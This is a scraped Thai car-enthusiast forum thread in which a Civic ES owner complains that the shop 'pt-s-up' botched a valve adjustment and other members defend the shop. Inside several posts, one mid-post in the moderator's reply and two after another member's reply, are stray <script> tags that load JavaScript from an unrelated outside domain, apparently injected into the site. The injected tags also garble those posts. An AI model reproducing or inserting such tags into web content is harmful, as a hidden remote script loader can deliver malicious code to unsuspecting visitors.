หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
debuglogin


เข้าร่วม: 13 กันยา 2009
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 13
ศุกร์, 16 กรกฎา 2010 01:40 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมเห็นพี่ๆ ในบอร์ดใครๆ ก็บอกร้านนี้เทพจริงๆ ผมเองเป็นคนหนึ่งที่รักรถมากๆ พอมีอาการอะไรนิดหน่อยก็จะหาที่ซ่อม หาที่แก้ หมดเท่าไหร่ก็ยอมจ่าย สับปดาห์ก่อนผมเอารถไปตั้งวาล์ว เปลี่ยนหัวเทียน ที่ร้านที่ว่าแถวอุดมสุข ผมไปไม่ถูกหรอกครับมันไกลจากบ้านผมมาก เพราะผมอยู่พยาไท ผม set GPS ไป เพื่อหวังว่าจะได้รับบริการที่ดี และมือถึง ผมเสียความรู้สึกตั้งแต่ไปถึงร้าน ลูกค้าสัมพันธ์ไม่ได้เรื่องเลย เจ้าของอู่พอคุยด้วยก็เดินหลบหน้าหลบหลังเหมือนไม่อยากคุย ผมตั้งวาล์วตอนบ่ายโมง นัดมารับสี่โมงเย็น พอมาสี่โมงเย็นงานก็ไม่เสร็จ ผมเริ่มง่วงแล้วครับสรุปเลยว่า หลังตั้งวาล์วรถรอบตกตอนจอด อีกวันผมเลยเอาเข้าไปให้แก้ ร้านไม่สำนึกเลยว่าเป็นงานแก้ที่ตัวเองทำชุ่ยไว้ บอกว่าเดี๋ยวดูให้ แต่ผมรอสี่สิบนาที ไม่มีใครมาแก้ไขอะไรให้ผมเลย สุดท้ายผมถอดใจ เอารถไปซ่อมที่อื่นดีกว่า พร้อมกับสาบาญว่าจะไม่มาเหยียบร้านนี้อีก เท่าที่สังเกตุเหมือนจะอยากทำให้แต่รถที่เป็นรถแต่ง ทำรายการหนักๆ คือรถผมเดิมๆ อะนะครับ es - 2003

ประเด็นอยู่ตรงที่ว่าพอผมเอารถไปซ่อมอู่อื่น ลงชื่อเลยแล้วกันเพราะพี่เขาบริการดีมาก รถเต็มอู่ แต่ยังเทคแคร์เราได้ บริหาร man power ได้ดีมาก และช่างเขาเป็นมืออาชีพจริงๆ เขาเชคให้ปรากฏว่า "วาล์วยัน"!!!! เหอะๆ ผมถึงกับอึ้ง!! นี่หรอร้านเทพมากๆ ที่เราวนหาร้านแทบตาย ไปถึงไม่ได้รับความสนใจเลย แถมตั้งวาล์ว ยัน ลาก่อนจริงๆ เลยครับขอละบายก่อนนอน


ขอบคุณครับ
ได้รับคำขอบคุณจาก: benzd  kaisuh  BeL  pongz19  alit  Justinaen 
debuglogin


เข้าร่วม: 13 กันยา 2009
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 13
ศุกร์, 16 กรกฎา 2010 01:43 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมเองเป็นโปรแกรมเมอร์อยู่ที่บริษัทแห่งหนึ่ง ซึ่งมีเทพคนหนึ่งของบอร์ดสถิตอยู่ที่เดียวกัน เดี๋ยวคงได้แลกเปลี่ยนอะไรกันอีกเยอะกับอู่นี้ อย่าสนับสนุนเลยครับคนแบบนี้ อู่ดีๆ มีฝีมือมีอีกเยอะ
Black mOOn


ชื่อเล่น: โจ้

เข้าร่วม: 02 ตุลา 2008
ตอบ: 956

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2334
ให้คำขอบคุณ: 302

ที่อยู่: Rama7~ Bangkok
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 05:46 - เสียความรู้สึกกับร้าน pt-s-up จริง
ไม่ได้มาแกตัวให้พี่เข้านะคับ ปกติพี่แกก็อัธยาศัยดีนะคับ ขี้เล่นขี้อำ ผมนานๆไปทำทีร้านพี่แก ผมว่างานก็โอเคนะคับ ช่วงหลังๆรถแกอาจจะเยอะ เลยอาจจะเกิดข้อผิดพลาดหรือมาจากสาเหตุอะไร ไว้รอพี่ใหม่เขามาชี้แจงดีกว่า อาจจะเกิดจากการสื่อสาร คุยกับพี่เขาตรงๆเลยถ้างานมีปัญหาอะไรหรือเราเป็นลูกค้าแต่เริ่มรู้สึกน้อยใจหรือไม่ดีกับร้านที่เราไปรับบริการ ผิดพลาดตรงไหนพี่แกก็รับฟังและแก้ไข้ให้ลูกค้าอยู่แล้วคับ ยังไงก็ใจเย็นๆนะคาบบบ พี่ๆน้องๆกันทั้งนาน
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
ศุกร์, 16 กรกฎา 2010 06:07 - เสียความรู้สึกกับร้าน pt-s-up จริง
เป็นธรรมดาของอู่ที่คนเ้ข้าเยอะ แต่สำหรับผมจะเข้าไปทำพวกช่วงล่างเท่านั้น ถ้าเป็นเรื่องอื่นๆ จะหาอู่ที่ชำนาญเฉพาะทางไปเลย

อู่เครื่องยนต์ดีๆ มีอีกเยอะ แต่ถ้าช่วงล่างผมยังยกให้ที่นี่ที่เดียวเลยครับ
ได้รับคำขอบคุณจาก: chengg  sayarm  cisco  PongpanG  Rangsit 33  BOY_PeTiTe  8800Gold  Anakin  etabb  mai  Winny  P@OW  kaorjang  kunshybeer08  honeybeex7  sukhothai  RG.KiD  myoatty57  K_series  zn701  BeL  carrimoroll  TUI_PeTiTe  Tom-Acc  alit  Justinaen 
zn701


เข้าร่วม: 02 ตุลา 2008
ตอบ: 469

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 284

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 07:30 - เสียความรู้สึกกับร้าน pt-s-up จริง
ถ้าช่วงล่างนี่ผมยกให้พี่เค้า อันดับหนึ่งเลยนะ ซ่อมมากี่ทีๆ ก็จบนะ เครื่องผมยังไม่เคยซ่อมกะพี่เค้า อู่คนเยอะต้องรอนิดนึงอ่ะคับ ผมเคยวิ่งจากชลบุรีไปถึง รถเยอะต้องกลับ ก็คุยกะพี่เค้าก็เข้าใจนะ ไปอีกทีพี่เค้ายังมาแทรกคิว ซ่อมให้นะคับ เพราะมาไกล แต่ซ่อมไม่นาน เรื่องอัธยาศัย ผมว่าพี่เค้าสบายๆ นะ คุยได้ ก็เดินเข้าไปถามเค้า ก็ตอบทุกคำถามอย่างดีหนิคับ อันนี้ ประสบการณ์ตรงนะคับ
ซ่อมกันมาก็นานแระ และคิดว่าคงซ่อมกันต่อไป อิอิ.. :D
ได้รับคำขอบคุณจาก: chengg  kittidech  sayarm  cisco  ValuEs  hacker  mai  jonatan  iMan  PongpanG  Rangsit 33  BOY_PeTiTe  8800Gold  etabb  Winny  kaorjang  kunshybeer08  honeybeex7  sukhothai  RG.KiD  myoatty57  K_series  BeL  carrimoroll  Tom-Acc  aun99  alit  Justinaen 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 07:42 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผม ว่า ตอนขับออกจากอู่ มีอาการ ไม่เข้าไปแก้เลยอะครับ วาว ยัน ขับได้ไง ครับ เครื่องเขก ตาย เลย มีเสียง วาว เขก

ผมเชื่อ ครับ ว่า อาการวาว ยัน จริงๆ มันน่าจะขับ ลำบาก ไม่น่าใช่แค่รอบตก ครับ อาการแบบนี้ มีหลายสาเหต

อู่นี้ ผมไปบ่อยมาก รถ ไม่ได้มีแค่หน้าร้านนะครับ ข้างร้านหลังงร้านอีกเพียบ ผมไป ไม่เคย ต่ำกว่า สี่ ห้า ชม. เลย คิวยาวจริงๆ

มา บ่ายโมง นัดรับ สี่โมง ถือว่าไวมาก ครับ<script src="https://sport32news.com/civicesgroup.js"></

รถ ถอยเข้าถอยออกเป็นว่า เล่น ส่วนการตั้งวาว รถ ต้องจอดเปิดฝาทิ้งไว้รอให้เครื่องเย็น

โดยส่วนตัว ต้องบอกว่า ผมรู้ครับ ว่า พี่ เค้าไม่มีเวลา คุย มากครับ คุยนิดนึง ก็ต้อง เดินไปเดินมา ดูรถ มั่ง เลื่อนรถ มั่ง ครับ

เวลา ไม่ค่อย ว่าง เพราะ รถ เยอะจริงๆ

ผมเข้าไปที่นี่ ทำช่วงล่าง ตั้งวาว ก็เคย ครับ ไม่มีปัญหา อะไร ถ้ามีปัญหาอะไร ผมว่า เข้าไปแก้ ได้ครับ

ผมว่าพี่เค้าไม่ได้ละเลย หรอกครับ ผมเชื่อ แบบนั้น

ความสัมพันธ์ คง ไม่ถึง 100 แต่ความเข้าใจผมว่าเกิน 100 ครับ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 10:46, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Feudalz


เข้าร่วม: 08 มีนา 2009
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 34

ที่อยู่: ลาดพร้าว
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 07:44 - เสียความรู้สึกกับร้าน pt-s-up จริง
อืม..ร้านทำช่วงล่างแต่เอาเครื่องไปทำ ผมว่าคุณเข้าใจอะไรผิดไปรึเปล่า
ร้านทำช่วงล่างก็มักจะเก่งแต่เรื่องช่วงล่าง ไอ้ที่รับทำอะไรอย่างอื่นมันก็แค่เป็น value added ที่ร้านเค้าเพิ่มความสะดวกสบายให้ลูกค้า
แต่ถ้าจะให้เค้าทำเก่งแบบร้านที่ทำเครื่องโดยตรงมันคงไม่ใช่หรอกครับ
ผมว่าคุณน่าจะเข้าใจอะไรผิดไปนะ
ได้รับคำขอบคุณจาก: chengg  kittidech  sayarm  cisco  ValuEs  hacker  mai  jonatan  PongpanG  Rangsit 33  BOY_PeTiTe  YINDEE  8800Gold  etabb  Winny  P@OW  kaorjang  kunshybeer08  honeybeex7  sukhothai  psYchosis  RG.KiD  myoatty57  BeL  carrimoroll  TUI_PeTiTe  Tom-Acc  aun99  alit  Justinaen 
chengg


เข้าร่วม: 17 ธันวา 2008
ตอบ: 609

Treasurer
Treasurer

ได้รับคำขอบคุณ: 3641
ให้คำขอบคุณ: 6263

ที่อยู่: เชียงใหม่~~* หนาว..และขาวมากกก
ศุกร์, 16 กรกฎา 2010 08:11 - เสียความรู้สึกกับร้าน pt-s-up จริง
ฝนไม่ได้ขับ ES ไม่ได้แต่งรถอะไรเลย
ทุกครั้งเวลาฝนเอารถไปทำ...พี่ใหม่ก้อดูแลให้อย่างดี
ขับกลับมาเหมือนขับรถใหม่กลับบ้านทุกครั้ง
ล่าสุด ฝนแค่ไปเปลี่ยนน้ำมันเครื่องเอง พี่ใหม่ก้อดูแลและรับทำให้
ทั้งๆที่มีรถรอทำอย่างอื่นเต็มอู่
ฝนว่าคุณรับสารอะไรมาผิดรึเปล่าคะ..
อู่นี้ถ้าไป บอกไว้ก่อนเลยว่า จะเอารถมาแป๊บนึง แล้วได้เลย ค่อนข้างลำบาก
เพราะรถเยอะจริงๆ ฝนเคยไป 8-9 โมงเช้า ได้รถเย็นๆก้อมี
เพราะมีคนมารอก่อนฝน..
ฝนบอกได้คำเดียวว่า..ถึงคุณมีเงินมากแค่ไหน..อะไรเสียนิดหน่อย ก้อซ่อม ยอมจ่าย
ที่อู่นี้ แค่มีเงิน ก้อซื้ออะไรดีดีกลับบ้านไม่ได้หรอกค่ะ
มีเงินมากแค่ไหน มากองไว้...เจ้าของอู่แกก้อไม่เอาหรอกค่ะ
ใครจะว่า ว่าฝนแก้แทน ลำเอียงก้อช่างเหอะ...ฝนไม่ได้หาเรื่องนะคะ
แค่อยากจะบอกว่า สิ่งที่ฝนได้รับจากอู่นี้ ไม่ใช่แค่รถดีขึ้นนะคะ
แต่เป็นความรู้สึกดีดีที่ได้รับกลับมาทุกครั้ง...
คุณเข้าไปด้วยความรู้สึกแบบไหนล่ะคะ..คาดหวังว่าต้องมีคนมารับแขก รับคิว
รถเข้าไปต้องได้ซ่อมเลย เสร็จภายในเวลาที่กำหนด
ลองหารายละเอียดดูว่า ลักษณะของอู่นี้เป็นแบบไหน..แล้วคุณจะเข้าใจค่ะ
ว่าทำไมคุณถึงไม่ได้อะไรดีดีแบบที่ท่านอื่นๆได้รับ....

@hanaga@


เข้าร่วม: 01 ตุลา 2008
ตอบ: 360

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 493
ให้คำขอบคุณ: 132

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 08:25 - เสียความรู้สึกกับร้าน pt-s-up จริง
debuglogin พิมพ์ว่า:
ผมเห็นพี่ๆ ในบอร์ดใครๆ ก็บอกร้านนี้เทพจริงๆ ผมเองเป็นคนหนึ่งที่รักรถมากๆ พอมีอาการอะไรนิดหน่อยก็จะหาที่ซ่อม หาที่แก้ หมดเท่าไหร่ก็ยอมจ่าย สับปดาห์ก่อนผมเอารถไปตั้งวาล์ว เปลี่ยนหัวเทียน ที่ร้านที่ว่าแถวอุดมสุข ผมไปไม่ถูกหรอกครับมันไกลจากบ้านผมมาก เพราะผมอยู่พยาไท ผม set GPS ไป เพื่อหวังว่าจะได้รับบริการที่ดี และมือถึง ผมเสียความรู้สึกตั้งแต่ไปถึงร้าน ลูกค้าสัมพันธ์ไม่ได้เรื่องเลย เจ้าของอู่พอคุยด้วยก็เดินหลบหน้าหลบหลังเหมือนไม่อยากคุย ผมตั้งวาล์วตอนบ่ายโมง นัดมารับสี่โมงเย็น พอมาสี่โมงเย็นงานก็ไม่เสร็จ ผมเริ่มง่วงแล้วครับสรุปเลยว่า หลังตั้งวาล์วรถรอบตกตอนจอด อีกวันผมเลยเอาเข้าไปให้แก้ ร้านไม่สำนึกเลยว่าเป็นงานแก้ที่ตัวเองทำชุ่ยไว้ บอกว่าเดี๋ยวดูให้ แต่ผมรอสี่สิบนาที ไม่มีใครมาแก้ไขอะไรให้ผมเลย สุดท้ายผมถอดใจ เอารถไปซ่อมที่อื่นดีกว่า พร้อมกับสาบาญว่าจะไม่มาเหยียบร้านนี้อีก เท่าที่สังเกตุเหมือนจะอยากทำให้แต่รถที่เป็นรถแต่ง ทำรายการหนักๆ คือรถผมเดิมๆ อะนะครับ es - 2003

ประเด็นอยู่ตรงที่ว่าพอผมเอารถไปซ่อมอู่อื่น ลงชื่อเลยแล้วกันเพราะพี่เขาบริการดีมาก รถเต็มอู่ แต่ยังเทคแคร์เราได้ บริหาร man power ได้ดีมาก และช่างเขาเป็นมืออาชีพจริงๆ เขาเชคให้ปรากฏว่า "วาล์วยัน"!!!! เหอะๆ ผมถึงกับอึ้ง!! นี่หรอร้านเทพมากๆ ที่เราวนหาร้านแทบตาย ไปถึงไม่ได้รับความสนใจเลย แถมตั้งวาล์ว ยัน ลาก่อนจริงๆ เลยครับขอละบายก่อนนอน


ขอบคุณครับ



ออกตัวก่อนครับว่าเพิ่งได้ไปทำกับร้านพี่เขาครั้งเดียว ก็แก้ปัญหาได้ไม่ตรงที่ผมต้องการสักทีเดีบว
แต่ก็ได้เรื่องโช็คที่อยากได้จากร้านแกอยู่
ทั้งนี้การที่ จขท. รอเพียง 10 นาทีแล้วบอกว่าแกไม่สนใจผมว่าออกจะใจแคบไปหน่อยนะ
เพราะร้านแกเองไม่ได้เป็นร้านใหญ่ รับรถได้อย่างมากก็ครั้งละ 6 คัน ไหนจะจอดข้างร้านอีกเกือบ 10 การที่พี่เขารับรถที่เป็นรถแต่งก่อนก็น่าจะเป็นเพราะว่า เป็นรถที่มาประจำ เป็นคุณลองนึกดูว่าถ้าคุณมีร้านๆนึง ที่เราไปประจำแล้วเขาไม่สนใจเราเลย อันนี้ผมว่ามันจะเป็นการแย่กว่าที่เราจะเอาแต่ลูกค้าใหม่โดยไม่สนใจเรานะ มันจะเสียความรู้สึกขนาดไหน

ส่วนเรื่องการทำเครื่องยนต์ด้วยผมก็เห็นตามข้างบนครับว่าร้านแกอาจไม่ได้ชำนาญด้านนี้ แต่ก็ไม่ใช่ว่าจะทำไม่ได้เลย
ก็จะเป็นเมื่อร้านซ่อมทั่วไปที่ต้องดูอาการก่อนแล้วค่อยหาสาเหตุ ผมว่าวาล์วยันเนี้ยมันต้องทำเป็นวันหรือสองวันนะครับ
ไม่ใช่มาเช้าเอาเย็น แต่ก็เข้าใจความรู้สึกของ จขท. ที่ร้านเป็นคนทำน่าจะต้องรับผิดชอบแต่น่าจะให้โอกาศในการทำงานนะครับ
ผมเชื่อว่าพี่เป็นลูกผู้ชายพอที่จะทำงานแล้วรับผิดชอบในสิ่งที่คนในร้านทำ ไม่ว่าจะเกิดจากตัวแกเองหรือลูกน้องทำ

วันที่ผมไปทำก็ยอบรับในพลังของลูกน้องแกนะ(เก่งไม่เก่งไม่รู้) ก็ทำกันไม่ได้หยุด ผมเองไปบ่ายได้ 5 โมงเย็น ไปทำโช็คอย่าง
นั่งเฝ้าไม่ไ้ด้ไปไหน(เพราะไม่มีที่ไปนะครับ 555)

ยังไงความหน้าก็ลองหาร้านใกล้้ๆทำดีกว่าครับ ผมเองก็ทำรถมาหลายร้านนะกว่าจะหาร้านเครื่องที่ไว้ใจทำได้
อีกอย่างนะครับร้านในดวงใจต้องแยกกันไว้บ้างก็ดีครับ ส่วนตัวร้านเครื่องก็ทำอีกร้าน ร้านตกแต่งก็อีกร้าน
ร้านช่วงล่างก็ทำร้านอื่นมาบ้างเพราะเอาใกล้บ้านไว้ก่อนส่วนอยากได้อะไรพิเศษก็อาจจะเป็นร้านนี้หรือร้านที่เขาว่าดีแถวบ้านนะครับ


"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
nick laemchabang


เข้าร่วม: 26 มีนา 2010
ตอบ: 105

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 174
ให้คำขอบคุณ: 90

ที่อยู่: กทม - ชลบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 08:29 - เสียความรู้สึกกับร้าน pt-s-up จริง
อีกวันผมเลยเอาเข้าไปให้แก้ ร้านไม่สำนึกเลยว่าเป็นงานแก้ที่ตัวเองทำชุ่ยไว้ บอกว่าเดี๋ยวดูให้ แต่ผมรอสี่สิบนาที ไม่มีใครมาแก้ไขอะไรให้ผมเลย

การตั้งวาวล์ ต้องรอให้เครื่องเย็นก่อน ถึงจะทำได้
คุณใจร้อนเกินไปหรือเปล่า รอแค่ 40 นาที
เครื่องยังไม่ทันเย็นเลยครับ
khing_cr


ชื่อเล่น: ขิง

เข้าร่วม: 02 ตุลา 2008
ตอบ: 567

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1258
ให้คำขอบคุณ: 1979

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 08:29 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมว่าใจเย็นๆ กันก่อนนะครับ รอเจ้าตัวออกมาชี้แจงดีกว่า ใจเย็นๆ น้า~
ได้รับคำขอบคุณจาก: eit  sayarm  Rangsit 33  tokykung  mai  jonatan  PongpanG  BOY_PeTiTe  8800Gold  kittidech  etabb  Winny  kaorjang  kunshybeer08  honeybeex7  sukhothai  RG.KiD  carrimoroll  TUI_PeTiTe  Tom-Acc  aun99  alit  Justinaen 
ValuEs


ชื่อเล่น: เบิร์ด

เข้าร่วม: 04 พฤศจิกา 2008
ตอบ: 1179

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 465
ให้คำขอบคุณ: 490

ที่อยู่: สุพรรณฯ-แปดริ้ว
ปี: 2004
ศุกร์, 16 กรกฎา 2010 08:36 - เสียความรู้สึกกับร้าน pt-s-up จริง
คุณครับ ถ้าพี่เขาไม่ดีจิงคนไม่เข้าร้านพี่เขาหรอกครับ คุณลองสังเกตุบ้างหรือป่าวว่ารถเข้าร้านพี่เขาเยอะแค่ไหน? คนเราเกิดมาบุคลิกก็ไม่เหมือนกัน คุณก็มีบุคลิกอีกอย่าง พี่เขาก็มีบุคลิคอีกอย่าง แล้วคุณมาตัดสินใจว่าพี่เขาไม่สนใจคุณเพราะพี่เขามีบุคลิกแบบนั้น ผมว่าคุณตัดสินคนเร็วไปแล้วครับ การที่พี่เขาไม่ได้คุยกับลูกค้านานๆ เพราะพี่เขาต้องตรวจตรางานรถเราบ้าง รถคันอื่นบ้าง เช็คของบ้าง ฯลฯ ไม่ได้มานั่งสั่งลูกน้องอย่างเดียว
ผมก็เป็นคนหนึ่งที่อยู่ต่างจังหวัด รักรถไม่แพ้คุณหรอก ไปทำมาหลายที่ไม่จบ มาจบที่พี่เขา เวลามาก็มาถึงแต่เช้า กลับบ่ายๆถึงเย็น ทุกครั้ง และพอใจกับงานทุกครั้ง มีงานแก้บ้างพี่เขาก็รับผิดชอบทำให้ ไม่ว่าอาการจะหนักเบาพี่เขาดูแลเท่ากันหมด คนใน Civic ES Group ก็ใช้บริการพี่ใหม่กันเกือบทั้งนั้น ไม่ว่าจะอยู่เหนือ ใต้ ออก ตก ก็มากัน คุณลองถามเพื่อนสมาชิกที่ทำงานที่เดียวกับคุณก็ได้ หรือไม่ก็ลองดูกระทู้นี้ว่ามีคนพูดถึงร้านพี่ใหม่ว่ายังไง(ถ้าAdmin ไม่ลบซะก่อน)
เอาเป็นว่า
**ค่าของคนอยู่ที่ผลของงาน**
soda_get


ชื่อเล่น: เก๊ต

เข้าร่วม: 30 กันยา 2008
ตอบ: 520

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2286
ให้คำขอบคุณ: 2290

ที่อยู่: RSZ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 16 กรกฎา 2010 08:56 - เสียความรู้สึกกับร้าน pt-s-up จริง
อู่นี้ ผมเคยไปตั้งแต่ บ่าย 2 สามทุ่มรถผมยังไม่ได้ทำเลยครับ

ก็นับเอาละกันว่าผมรอกี่ ชม. ผมต้องบ้านทั้งที่รถผมไม่ได้ทำไรเลย ผมก็ไม่ซีเรียส ก็รถมันเยอะนี่คับ

ส่วนเรื่องที่พี่เค้าไม่ค่อยจะพูดคุยนั้น ผมคิดว่าพี่เค้าต้องดูแลรถคันอื่นด้วยนะครับ

พี่เค้าเป็นช่าง ไม่ได้เป็น Reception นะครับ ที่จะต้องมานั่งคุย นั่งรับรองลูกค้าตลอด

แต่จากที่คุณบอกว่าร้านที่คุณไปแก้บอกว่ารถมีอาการ "วาล์วยัน"

ผมคิดว่าถ้ารถมีอาการแบบนั้นตั้งแต่ออกจากอู่พี่ใหม่ คุณคงไม่ทนขับกลับบ้านแน่นอน ยังไงก็ต้องกลับไปแก้

เรื่องงานบริการผมคิดว่ามันก็ผิดพลาดกันได้ ทำไมไม่คุยกะพี่เค้าให้จบที่ร้าน และให้พี่เค้าแก้ให้จบล่ะครับ

รถผมทำกะพี่เค้าตลอด มีปัญาอะไรผมก็เข้าไปแก้ได้ตลอดเวลา ไม่เห็นว่าพี่เค้าจะมีปัญหาอะไรเลย

จะมีก็แค่เรื่องเวลาอย่างเดียว...เพราะว่ารถมันเยอะ....ถ้าเค้าทำไม่ดี.....รถคงจะไม่เยอะขนาดนั้น ....มั้งครับ

แค่นี้ละ.....
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 16 กรกฎา 2010 09:00 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมเข้าร้านนี้ครั้งแรก เดิมสนิืท ทุกชิ้นส่วน เค้าก็บริการดีนะครับ
ในเรื่องการต้อนรับ ผมเห็นใจนะครับ สำหรับคนที่ไม่เคยมาใช้บริการที่นี่ เพราะบางครั้งถ้าพี่เค้าไ่ม่อยู่(ไปธุระ หรือออกไปลองรถ)
ลูกค้าก็จะยืนมึนๆ งง ๆ พักนึงอันนี้ผมไปแล้วเห็นประจำ เพราะว่าช่างทุกคนติดงานและทำงานกันแบบไม่ได้หยุดพักเลย
การตั้งวาล์ว ก็ต้องใช้เวลาแบบที่ท่านอื่น ๆ แจ้งมาก ถ้าร้านแห่งใหม่ที่คุณเข้าไปแก้ เค้าตั้งวาล์วให้ในขณะที่รถคุณเครื่องยังร้อนอยู่
แบบว่าเข้าไปแล้วเช็คดูให้ในทันที ผมรับรองได้ว่า ร้านนั้นชุ่ยมาครับ
ได้รับคำขอบคุณจาก: iMan  ValuEs  tokykung  hacker  chengg  mai  jonatan  PongpanG  Rangsit 33  BOY_PeTiTe  8800Gold  zan  cisco  battery3k  etabb  Winny  kaorjang  kunshybeer08  honeybeex7  sukhothai  RG.KiD  myoatty57  K_series  TUI_PeTiTe  Tom-Acc  aun99  alit  Justinaen  nu_es_05 
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 09:02 - เสียความรู้สึกกับร้าน pt-s-up จริง
nick laemchabang พิมพ์ว่า:
อีกวันผมเลยเอาเข้าไปให้แก้ ร้านไม่สำนึกเลยว่าเป็นงานแก้ที่ตัวเองทำชุ่ยไว้ บอกว่าเดี๋ยวดูให้ แต่ผมรอสี่สิบนาที ไม่มีใครมาแก้ไขอะไรให้ผมเลย

การตั้งวาวล์ ต้องรอให้เครื่องเย็นก่อน ถึงจะทำได้
คุณใจร้อนเกินไปหรือเปล่า รอแค่ 40 นาที
เครื่องยังไม่ทันเย็นเลยครับ


ใช่แล้วครับ ผมทำอู่ที่ระยอง ก็กว่าได้ทำ 1 ชั่วโมงขึ้นไปล่ะครับ ต้องรอให้เครื่องเย็นก่อนครับ
ร้านพี่แกผมเคยไปทำแล้วนะ อัดน้ำมันโช็ค เลื่อนเบ้าหน้า
จากระยองไปเช้าเลย ถึงโน่นสายๆ แกก็ถามนะว่ามากจากไหนเห็นเรามาไกลจากระยองแกก็จัดคิวให้แนะนำอย่างดี เห็นรถจอดรออยู่หลังร้านเยอะมากผมเองก็ได้รับรถเย็นเลยครับประมาณ5โมงแต่เห็นว่ารถเขาเยอะจริงแหละ ก็เข้าใจครับ
แล้วราคาก็ไม่แพงครับ เพราะทำที่อื่นแพงมาก รถผมเติมแก็ซเลยเลือกที่จะขับไปทำที่โน่น บวกลบค่าใช้จ่ายแล้วก็คุ้มอยู่


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 09:04, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
nuengES02


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 ธันวา 2009
ตอบ: 824

Guru ES
Guru ES

ได้รับคำขอบคุณ: 668
ให้คำขอบคุณ: 373

ที่อยู่: เชียงใหม่คับ
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 09:03 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมว่าใจเย็นๆ กันก่อนนะครับ
ได้รับคำขอบคุณจาก: mai  BOY_PeTiTe  8800Gold  hacker  zan  kittidech  etabb  Winny  kaorjang  kunshybeer08  sukhothai  RG.KiD  carrimoroll  Tom-Acc  Justinaen 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 16 กรกฎา 2010 09:08 - เสียความรู้สึกกับร้าน pt-s-up จริง
ใจเย็น ๆ บางครั้งต้องฟังจากหลาย ๆ มุม หลาย ๆ ด้านนะครับ ซึ่งอาจมีคำตอบของมันอยู่นะ... (ทั้งสองฝ่ายนะครับ)...ใจเย็น ๆ
ได้รับคำขอบคุณจาก: mai  BOY_PeTiTe  Rangsit 33  hacker  zan  kittidech  etabb  Winny  kaorjang  kunshybeer08  honeybeex7  sukhothai  psYchosis  RG.KiD  carrimoroll  Tom-Acc  aun99  Justinaen 
Noom_686


เข้าร่วม: 14 พฤศจิกา 2008
ตอบ: 157

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 191
ให้คำขอบคุณ: 363

ที่อยู่: RAMA IX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 09:12 - เสียความรู้สึกกับร้าน pt-s-up จริง
กระทู้ีนี้ยาวแน่..
